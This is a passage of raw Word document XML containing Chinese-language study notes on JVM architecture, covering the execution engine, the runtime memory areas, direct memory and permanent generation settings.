          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中。（右图表示了从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>源文件到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的整个过程，可配合理解。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>关于类的加载机制，可以参考</w:t>
      </w:r>
      <w:hyperlink r:id="rId70" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="CA0000"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/tonytfjing/article/details/47212291</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009376E7" w:rsidRDefault="009376E7" w:rsidP="009376E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>执行引擎：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>负责执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>文件中包含的字节码指令（执行引擎的工作机制，这里也不细说了，这里主要介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>结构）；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009376E7" w:rsidRDefault="009376E7" w:rsidP="009376E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="006B2872">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内存区（也叫运行时数据区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>运行的时候操作所分配的内存区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B43581" w:rsidRDefault="00B43581" w:rsidP="009376E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B2872">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00392C6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006B2872">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>直接内存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>库允许</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>程序使用直接内存，直接内存是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>堆外的、直接向系统申请的内存空间。通常，访问直接内存的速度会优于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>堆。因此出于性能考虑，读写频繁的场合可能会考虑使用直接内存。由于直接内尺寸在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>堆外，因此它的大小不会直接受限于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Xmx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>指定的最大堆大小，但是系统内存是有限的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>堆和直接内存的综合依然受限于操作系统能给出的最大内存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B43581" w:rsidRPr="00B43581" w:rsidRDefault="00B43581" w:rsidP="009376E7">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009376E7" w:rsidRPr="009376E7" w:rsidRDefault="009376E7" w:rsidP="009376E7"/>
    <w:p w:rsidR="0077602D" w:rsidRPr="00F41A4C" w:rsidRDefault="00582C16" w:rsidP="009D2D75">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00E0116B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D2D75" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> J</w:t>
      </w:r>
      <w:r w:rsidR="00F9425F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidR="009D2D75" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>内存模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516489" w:rsidRPr="00F41A4C" w:rsidRDefault="0030775A" w:rsidP="00203633">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的内存分栈内存、堆内存、本地方法栈</w:t>
      </w:r>
      <w:r w:rsidR="00BC7F6C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(native)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、方法区</w:t>
      </w:r>
      <w:r w:rsidR="00AE0A6A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00AE0A6A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r w:rsidR="00AE0A6A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>寄存器</w:t>
      </w:r>
      <w:r w:rsidR="00BF45A9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00BF45A9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidR="00BF45A9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>通过类加载器加载</w:t>
      </w:r>
      <w:r w:rsidR="00BF45A9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidR="00BF45A9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>文件内容</w:t>
      </w:r>
      <w:r w:rsidR="002A2672" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidR="00BF45A9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>内存，类、常量、方法会放到内存中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000966E6" w:rsidRPr="00F41A4C" w:rsidRDefault="00203633" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00EE618C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>防止内存溢出，</w:t>
      </w:r>
      <w:r w:rsidR="005104E0" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>堆内存会</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>自动进行垃圾回收，堆内存区分</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>新生区、旧生区、永久存储区</w:t>
      </w:r>
      <w:r w:rsidR="000966E6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00050909" w:rsidRPr="00F41A4C" w:rsidRDefault="00050909" w:rsidP="000B590D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>永久存储区：存放要加载的类</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>接口的信息（名称、修饰符等）、类的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>变量、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>常量、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Field</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>信息、方法信息（元数据）。通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>对象获取的相关数据就来自该区域。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>见</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>Class</w:t>
        </w:r>
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>类</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sun JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>中这块区域对应</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Permanet Generation</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>（持久代），默认最小值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>16MB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，最大值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>64MB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，可通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-XX:PermSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>-XX:MaxPermSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>来设置最小值和最大值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00050909" w:rsidRPr="00F41A4C" w:rsidRDefault="00050909" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000966E6" w:rsidRPr="00F41A4C" w:rsidRDefault="000966E6" w:rsidP="00782D36">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
